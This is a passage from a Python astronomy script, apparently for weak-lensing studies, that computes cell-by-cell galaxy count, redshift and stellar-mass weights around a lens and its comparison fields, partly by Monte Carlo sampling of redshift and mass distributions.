cat_lens_reclassif['X'][k] * pixlens / pixCFHT).value] == 0):\n                    #print i,j,k,len(cat_lens_reclassif),cat_lens[k]\n                    catupdate_lens[i][j][0].add_row(cat_lens_reclassif[k])\n                    # the first condition is necessary because, the way the code is written now, the lens field mask is not used to actually mask the catalogue\n\n    #print catupdate_lens[5][10][0]['dist']\n    #print i,j\n    #print xlow,xhigh,ylow,yhigh\n    #print msk[0].data[xlow : xhigh, ylow : yhigh].size\n\n#print centerfields\n    #print maskedcell\n    msk.close()\n    print(\"--- %s seconds ---\" % (time.time() - start_time))\n    print \"Computing lens weights...\"\n    start_time = time.time()\n\n# Compute the weights for the lens\n# I'm interested in using the probability distribution function (PDF) for the z and Mstar of each object; first, I use the most probable values, then I sample from the (simplified) PDFs\n\n    #if str(sys.argv[8]) == \"orig\":\n    gal_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n    zweight_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n    mass_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n    mass2_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n    mass3_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n    mass2rms_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n    mass3rms_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n    oneoverr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n    zoverr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n    massoverr_lensorig = 
np.zeros((cells_on_a_side,cells_on_a_side))\n mass2overr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n mass3overr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n zmassoverr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n zmass2overr_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n mass2overrrms_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n mass3overrrms_lensorig = np.zeros((cells_on_a_side,cells_on_a_side))\n #if str(sys.argv[8]) == \"samp\":\n # for each cell, I will have 100 or 1000 realizations of the weighted sums\n gal_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n oneoverr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zweight_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2rms_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3rms_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zoverr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n massoverr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2overr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3overr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zmassoverr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zmass2overr_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2overrrms_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3overrrms_lens = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n #if str(sys.argv[8]) == \"tab\":\n # tabulated PDF for z and Mstar\n gal_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n oneoverr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zweight_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2rms_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3rms_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zoverr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n massoverr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2overr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3overr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zmassoverr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n zmass2overr_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass2overrrms_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n mass3overrrms_lens_tab = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n\n for i in range(cells_on_a_side):\n for j in range(cells_on_a_side):\n #if str(sys.argv[8]) == \"orig\":\n 
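# Added clarification note: gal counts the galaxies in the cell; zweight implements\n            # w = z * (z_s - z), which vanishes at z = 0 and at z = z_s and peaks at z = z_s / 2\n            # (e.g. for z_s = 1.39 and z = 0.7, w = 0.7 * 0.69 = 0.483); the mass weights use\n            # linear stellar masses 10**mass_med, and the rms variants are the sqrt / cbrt of\n            # the summed squares / cubes.\n            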
gal_lensorig[i][j]=len(catupdate_lens[i][j][0])\n zweight_lensorig[i][j] = np.sum((z_s_lens * catupdate_lens[i][j][0]['z']) - (catupdate_lens[i][j][0]['z'] * catupdate_lens[i][j][0]['z']))\n mass_lensorig[i][j] = np.sum(10**catupdate_lens[i][j][0]['mass_med'])\n mass2_lensorig[i][j] = np.sum((10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']))\n mass3_lensorig[i][j] = np.sum((10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']))\n mass2rms_lensorig[i][j] = np.sqrt(mass2_lensorig[i][j])\n mass3rms_lensorig[i][j] = scipy.special.cbrt(mass3_lensorig[i][j])\n oneoverr_lensorig[i][j] = np.sum(1. / catupdate_lens[i][j][0]['dist'])\n zoverr_lensorig[i][j] = np.sum(((z_s_lens * catupdate_lens[i][j][0]['z']) - (catupdate_lens[i][j][0]['z'] * catupdate_lens[i][j][0]['z'])) / catupdate_lens[i][j][0]['dist'])\n massoverr_lensorig[i][j] = np.sum(10**catupdate_lens[i][j][0]['mass_med'] / catupdate_lens[i][j][0]['dist'])\n mass2overr_lensorig[i][j] = np.sum((10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']) / catupdate_lens[i][j][0]['dist'])\n mass3overr_lensorig[i][j] = np.sum((10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']) / catupdate_lens[i][j][0]['dist'])\n zmassoverr_lensorig[i][j] = np.sum(((z_s_lens * catupdate_lens[i][j][0]['z']) - (catupdate_lens[i][j][0]['z'] * catupdate_lens[i][j][0]['z'])) * (10**catupdate_lens[i][j][0]['mass_med']) / catupdate_lens[i][j][0]['dist'])\n zmass2overr_lensorig[i][j] = np.sum(((z_s_lens * catupdate_lens[i][j][0]['z']) - (catupdate_lens[i][j][0]['z'] * catupdate_lens[i][j][0]['z'])) * (10**catupdate_lens[i][j][0]['mass_med']) * (10**catupdate_lens[i][j][0]['mass_med']) / catupdate_lens[i][j][0]['dist'])\n mass2overrrms_lensorig[i][j] = np.sqrt(mass2overr_lensorig[i][j])\n mass3overrrms_lensorig[i][j] = scipy.special.cbrt(mass3overr_lensorig[i][j])\n\n # from here on I sample from the PDFs of z and Mstar. 
Here I'm using simplified PDFs, since I only have the most probable values and +/-1sigma\n            #if str(sys.argv[8]) == "samp":\n            sample_lensz=np.zeros((len(catupdate_lens[i][j][0]['z']),int(str(sys.argv[4]))))\n            # for each object, create 100 or 1000 samples\n            sample_lensmass=np.zeros((len(catupdate_lens[i][j][0]['mass_med']),int(str(sys.argv[4]))))\n            frac_lensz=1-1.0*(catupdate_lens[i][j][0]['z_sup']-catupdate_lens[i][j][0]['z'])/(catupdate_lens[i][j][0]['z_sup']-catupdate_lens[i][j][0]['z_inf'])\n            frac_lensmass=1-(1.0*(10**catupdate_lens[i][j][0]['mass_sup']-10**catupdate_lens[i][j][0]['mass_med'])/(10**catupdate_lens[i][j][0]['mass_sup']-10**catupdate_lens[i][j][0]['mass_inf']))\n            for k in range(len(catupdate_lens[i][j][0]['z'])): # for each object, create its samples\n                sample_lenssup=np.zeros(int(str(sys.argv[4])))\n                sample_lensinf=np.zeros(int(str(sys.argv[4])))\n                if (frac_lensz[k] > 0) and (frac_lensz[k] < 1):\n                    # in this case I sample from two Gaussians, to the left and right of the most probable value\n                    sample_lenssup=catupdate_lens[i][j][0]['z'][k]+abs(np.random.normal(0, catupdate_lens[i][j][0]['z_sup'][k]-catupdate_lens[i][j][0]['z'][k], int(str(sys.argv[4]))))\n                    sample_lensinf=catupdate_lens[i][j][0]['z'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['z'][k]-catupdate_lens[i][j][0]['z_inf'][k], int(str(sys.argv[4]))))\n                    # make sure redshifts are positive\n                    while len(sample_lensinf[sample_lensinf<0]) > 0:\n                        sample_lensinf[sample_lensinf<0]=catupdate_lens[i][j][0]['z'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['z'][k]-catupdate_lens[i][j][0]['z_inf'][k], len(sample_lensinf[sample_lensinf<0])))\n                    rand=np.random.random(int(str(sys.argv[4])))\n                    sample_lensz[k]=sample_lensinf\n                    sample_lensz[k][np.where(rand>frac_lensz[k])]=sample_lenssup[np.where(rand>frac_lensz[k])]\n                    #sample_lensz[k][sample_lensz[k]<0]=0\n                if (frac_lensz[k] <= 0) or (frac_lensz[k] >= 1):\n                    # in this case I ignore the most probable value and I sample from a single Gaussian centered in the middle of +/-1sigma\n                    sample_lensz[k]=np.random.normal(catupdate_lens[i][j][0]['z_inf'][k]+(catupdate_lens[i][j][0]['z_sup'][k]-catupdate_lens[i][j][0]['z_inf'][k])/2, (catupdate_lens[i][j][0]['z_sup'][k]-catupdate_lens[i][j][0]['z_inf'][k])/2, int(str(sys.argv[4])))\n                    #sample_lensz[k][sample_lensz[k]<0]=0\n                # for mass, assume a Gaussian distribution in log space, not linear space, so I don't get things like negative mass\n                if (frac_lensmass[k] > 0) and (frac_lensmass[k] < 1):\n                    sample_lenssup=10**(catupdate_lens[i][j][0]['mass_med'][k]+abs(np.random.normal(0, catupdate_lens[i][j][0]['mass_sup'][k]-catupdate_lens[i][j][0]['mass_med'][k], int(str(sys.argv[4])))))\n                    sample_lensinf=10**(catupdate_lens[i][j][0]['mass_med'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['mass_med'][k]-catupdate_lens[i][j][0]['mass_inf'][k], int(str(sys.argv[4])))))\n                    rand=np.random.random(int(str(sys.argv[4])))\n                    sample_lensmass[k]=sample_lensinf\n                    sample_lensmass[k][np.where(rand>frac_lensmass[k])]=sample_lenssup[np.where(rand>frac_lensmass[k])] # sampling to the left or right\n                if (frac_lensmass[k] <= 0) or (frac_lensmass[k] >= 1):\n                    sample_lensmass[k]=10**np.random.normal(catupdate_lens[i][j][0]['mass_inf'][k]+(catupdate_lens[i][j][0]['mass_sup'][k]-catupdate_lens[i][j][0]['mass_inf'][k])/2, (catupdate_lens[i][j][0]['mass_sup'][k]-catupdate_lens[i][j][0]['mass_inf'][k])/2, int(str(sys.argv[4])))\n            for k in range(int(str(sys.argv[4]))):\n                # for each sample ID, sum up the weights of different objects\n                # ignore objects with z>z_source for all 
weights when drawing from the z PDF\n gal_lens[i][j][k]=len(sample_lensz[:,k][sample_lensz[:,k]<z_s_lens])\n oneoverr_lens[i][j][k] = np.sum(1. / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n zweight_lens[i][j][k] = np.sum((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2))\n mass_lens[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens])\n mass2_lens[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2)\n mass3_lens[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**3)\n mass2rms_lens[i][j][k] = np.sqrt(mass2_lens[i][j][k])\n mass3rms_lens[i][j][k] = scipy.special.cbrt(mass3_lens[i][j][k])\n zoverr_lens[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n massoverr_lens[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens] / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n mass2overr_lens[i][j][k] = np.sum((sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n mass3overr_lens[i][j][k] = np.sum((sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**3) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n zmassoverr_lens[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) * (sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n zmass2overr_lens[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) * (sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n mass2overrrms_lens[i][j][k] = np.sqrt(mass2overr_lens[i][j][k])\n mass3overrrms_lens[i][j][k] = scipy.special.cbrt(mass3overr_lens[i][j][k])\n\n #if str(sys.argv[8]) == \"tab\":\n sample_lensz=np.zeros((len(catupdate_lens[i][j][0]['z']),int(str(sys.argv[4]))))\n # for each object, create 100 or 1000 samples\n sample_lensmass=np.zeros((len(catupdate_lens[i][j][0]['mass_med']),int(str(sys.argv[4]))))\n frac_lensz=1-1.0*(catupdate_lens[i][j][0]['z_sup']-catupdate_lens[i][j][0]['z'])/(catupdate_lens[i][j][0]['z_sup']-catupdate_lens[i][j][0]['z_inf'])\n frac_lensmass=1-(1.0*(10**catupdate_lens[i][j][0]['mass_sup']-10**catupdate_lens[i][j][0]['mass_med'])/(10**catupdate_lens[i][j][0]['mass_sup']-10**catupdate_lens[i][j][0]['mass_inf']))\n for k in range(len(catupdate_lens[i][j][0]['z'])): # for each object, create its samples\n #print \"cat\",k\n if catupdate_lens[i][j][0]['specz?'][k]==0: # tabulated values for non-specz objects\n dummy=pdzcat_lens[pdzcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][1:]\n dummy[dummy<0.001]=0\n z_tab=dummy\n #print \"z_tab\", catupdate_lens[i][j][0]['ID'][k], z_tab\n massbest_tab=np.zeros(70)\n massinf_tab=np.zeros(70)\n massmed_tab=np.zeros(70)\n masssup_tab=np.zeros(70)\n for l in range(70): # for each of the tabulated points\n if z_tab[l]!=0:\n massbest_tab[l]=mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][7+l*4]+catupdate_lens[i][j][0]['correction'][k]\n if mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][9+l*4]>=0:\n 
massmed_tab[l]=mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][9+l*4]+catupdate_lens[i][j][0]['correction'][k]\n else:\n massmed_tab[l]=massbest_tab[l]\n if mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][8+l*4]>=0:\n massinf_tab[l]=mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][8+l*4]+catupdate_lens[i][j][0]['correction'][k]\n else:\n massinf_tab[l]=massmed_tab[l]-0.1\n if mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][10+l*4]>=0:\n masssup_tab[l]=mstarcat_lens[mstarcat_lens[:,0]==catupdate_lens[i][j][0]['ID'][k]][0][10+l*4]+catupdate_lens[i][j][0]['correction'][k]\n else:\n masssup_tab[l]=massmed_tab[l]+0.1\n #print \"massbest_tab\", massbest_tab\n #print \"massinf_tab\", massinf_tab\n #print \"massmed_tab\", massmed_tab\n #print \"masssup_tab\", masssup_tab\n custm = stats.rv_discrete(name='custm', values=(zgridint, z_tab)) # sample from the tabulated distribution\n sample=custm.rvs(size=int(str(sys.argv[4]))) # Weird, sometimes custm samples from places where the distribution is 0. Below I ensure this doesn't happen. The cause is probably due to the probabilities not summing exactly to 1\n while len(sample[z_tab[sample]==0]) != 0:\n sample=custm.rvs(size=int(str(sys.argv[4])))\n sample_lensz[k]=zgrid[sample]\n #print \"sample\",sample\n #print \"sample_lensz1[k]\", k, sample_lensz[k]\n sample_massinf_tab=massinf_tab[sample] # since sample is constant, this insures that Mstar corresponds to z\n sample_massmed_tab=massmed_tab[sample]\n sample_masssup_tab=masssup_tab[sample]\n #print \"sample_massmed_tab\", sample_massmed_tab\n #print \"sample_masssup_tab\", sample_masssup_tab\n sample_lenssup=np.zeros(int(str(sys.argv[4])))\n sample_lensinf=np.zeros(int(str(sys.argv[4])))\n for l in range(int(str(sys.argv[4]))):\n sample_lenssup[l]=10**(sample_massmed_tab[l]+abs(np.random.normal(0, sample_masssup_tab[l]-sample_massmed_tab[l], 1)))\n sample_lensinf[l]=10**(sample_massmed_tab[l]-abs(np.random.normal(0, sample_massmed_tab[l]-sample_massinf_tab[l], 1)))\n rand=np.random.random(1)\n sample_lensmass[k][l]=sample_lensinf[l]\n frac_lensmass_samp=1-(1.0*(10**sample_masssup_tab[l]-10**sample_massmed_tab[l])/(10**sample_masssup_tab[l]-10**sample_massinf_tab[l]))\n if rand>frac_lensmass_samp:\n sample_lensmass[k][l]=sample_lenssup[l]\n #print \"sample_lensmass1[k]\", k, sample_lensmass[k]\n else: # for the zpecz objects, since the input catalogue is properly edited so that \"frac\" is well-behaved, this section is a stripped-down version of \"samp\"\n sample_lenssup=np.zeros(int(str(sys.argv[4])))\n sample_lensinf=np.zeros(int(str(sys.argv[4])))\n # in this case I sample from two gaussians, to the left and right of the most probable value\n sample_lenssup=catupdate_lens[i][j][0]['z'][k]+abs(np.random.normal(0, catupdate_lens[i][j][0]['z_sup'][k]-catupdate_lens[i][j][0]['z'][k], int(str(sys.argv[4]))))\n sample_lensinf=catupdate_lens[i][j][0]['z'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['z'][k]-catupdate_lens[i][j][0]['z_inf'][k], int(str(sys.argv[4]))))\n # make sure redshifts are positive\n while len(sample_lensinf[sample_lensinf<0]) > 0:\n sample_lensinf[sample_lensinf<0]=catupdate_lens[i][j][0]['z'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['z'][k]-catupdate_lens[i][j][0]['z_inf'][k], len(sample_lensinf[sample_lensinf<0])))\n rand=np.random.random(int(str(sys.argv[4])))\n sample_lensz[k]=sample_lensinf\n 
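# --- Illustrative aside (added; not called by the pipeline). --- The block above draws z\n                    # from a two-piece ("split-normal") distribution built from (z_inf, z, z_sup): with\n                    # probability frac it draws from the half-Gaussian below the peak, otherwise from\n                    # the one above. A minimal vectorized sketch of the same idea (the argument names\n                    # are hypothetical; np is the numpy module imported at the top of this script):\n                    def _split_normal_sketch(peak, lo, hi, n):\n                        # frac is the weight of the left half, as in frac_lensz above\n                        # (assumes lo < peak < hi, as guaranteed by the frac checks above)\n                        frac = 1 - 1.0 * (hi - peak) / (hi - lo)\n                        sup = peak + abs(np.random.normal(0, hi - peak, n))  # right half-Gaussian\n                        inf = peak - abs(np.random.normal(0, peak - lo, n))  # left half-Gaussian\n                        return np.where(np.random.random(n) > frac, sup, inf)\n                    # (the pipeline additionally resamples any redshift draws that fall below zero)\n                    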
sample_lensz[k][np.where(rand>frac_lensz[k])]=sample_lenssup[np.where(rand>frac_lensz[k])]\n                    #print "sample_lensz2[k]", k, sample_lensz[k]\n                    #sample_lensz[k][sample_lensz[k]<0]=0\n                    sample_lenssup=10**(catupdate_lens[i][j][0]['mass_med'][k]+abs(np.random.normal(0, catupdate_lens[i][j][0]['mass_sup'][k]-catupdate_lens[i][j][0]['mass_med'][k], int(str(sys.argv[4])))))\n                    sample_lensinf=10**(catupdate_lens[i][j][0]['mass_med'][k]-abs(np.random.normal(0, catupdate_lens[i][j][0]['mass_med'][k]-catupdate_lens[i][j][0]['mass_inf'][k], int(str(sys.argv[4])))))\n                    rand=np.random.random(int(str(sys.argv[4])))\n                    sample_lensmass[k]=sample_lensinf\n                    sample_lensmass[k][np.where(rand>frac_lensmass[k])]=sample_lenssup[np.where(rand>frac_lensmass[k])]\n                    #print "sample_lensmass2[k]", k, sample_lensmass[k]\n            for k in range(int(str(sys.argv[4]))):\n                # sum up the weights of different objects, corresponding to the same realization ID\n                # ignore objects with z>z_source for all weights when drawing from the z PDF\n                gal_lens_tab[i][j][k]=len(sample_lensz[:,k][sample_lensz[:,k]<z_s_lens])\n                oneoverr_lens_tab[i][j][k] = np.sum(1. / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n                zweight_lens_tab[i][j][k] = np.sum((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2))\n                mass_lens_tab[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens])\n                mass2_lens_tab[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2)\n                mass3_lens_tab[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**3)\n                mass2rms_lens_tab[i][j][k] = np.sqrt(mass2_lens_tab[i][j][k])\n                mass3rms_lens_tab[i][j][k] = scipy.special.cbrt(mass3_lens_tab[i][j][k])\n                zoverr_lens_tab[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n                massoverr_lens_tab[i][j][k] = np.sum(sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens] / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n                mass2overr_lens_tab[i][j][k] = np.sum((sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n                mass3overr_lens_tab[i][j][k] = np.sum((sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**3) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n                zmassoverr_lens_tab[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) * (sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n                zmass2overr_lens_tab[i][j][k] = np.sum(((z_s_lens * sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]) - (sample_lensz[:,k][sample_lensz[:,k]<z_s_lens]**2)) * (sample_lensmass[:,k][sample_lensz[:,k]<z_s_lens]**2) / catupdate_lens[i][j][0]['dist'][sample_lensz[:,k]<z_s_lens])\n                mass2overrrms_lens_tab[i][j][k] = np.sqrt(mass2overr_lens_tab[i][j][k])\n                mass3overrrms_lens_tab[i][j][k] = scipy.special.cbrt(mass3overr_lens_tab[i][j][k])\n\n    print("--- %s seconds ---" % (time.time() - start_time))\n\n#print gal_lens, sigma_mass2rms_lens\n\n# I think the RuntimeWarning: invalid value encountered in double_scalars can be ignored, because it shows up only for the rms weights, which means it's due to division by zero for the cells completely covered by the masks\n
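\n# Added aside (illustration only): those NaN-producing divisions come from cells that are\n# completely covered by the masks, where both the lens and field sums are zero. A guarded-\n# division sketch that would silence the warning (_safe_ratio_sketch is a hypothetical\n# helper, not used by the pipeline; np is the numpy module imported at the top):\n    def _safe_ratio_sketch(num, den):\n        with np.errstate(divide='ignore', invalid='ignore'):\n            q = np.true_divide(num, den)\n        return np.where(np.isfinite(q), q, 0.0)  # map 0/0 and x/0 to 0\n\n# Initialize all field weight measurements as blank matrices\n\n    #if str(sys.argv[8]) == "orig":\n    origfield_gal = 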
np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_zweight = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_mass = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_mass2 = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_mass3 = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_zoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_massoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side))\n origfield_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side))\n #if str(sys.argv[8]) == \"samp\":\n field_gal = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_zweight = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_mass = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_mass2 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_mass3 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_zoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_massoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n field_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n #if str(sys.argv[8]) == \"tab\":\n tab_field_gal = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_oneoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_zweight = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_mass = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_mass2 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_mass3 = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_zoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_massoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_mass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_mass3overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_zmassoverr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n tab_field_zmass2overr = np.zeros((cells_on_a_side,cells_on_a_side,int(str(sys.argv[4]))))\n\n# Use objects from the field catalogue that pass the redshift, separation, and mask tests\n\n print 'Computing field weights...'\n start_time = time.time()\n i=0\n pos_mstar=0\n #pos_mstar_remember=0\n with open('%s.cat' % [c[0:len(listfields[0])-1] for c in listfields][count]) as fieldcat:\n for gal in fieldcat:\n if (gal!=\"\\n\") and (gal.split()[0]!=\"#id\"):\n i=i+1\n #print i\n catfield=Table(names=('ID','ALPHA_J2000','DELTA_J2000','MASK','star_flag','MAG_i','MAG_y','Z_B','Z_B_MIN','Z_B_MAX','LP_log10_SM_MED','LP_log10_SM_INF','LP_log10_SM_SUP'),dtype=('<S13', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', 
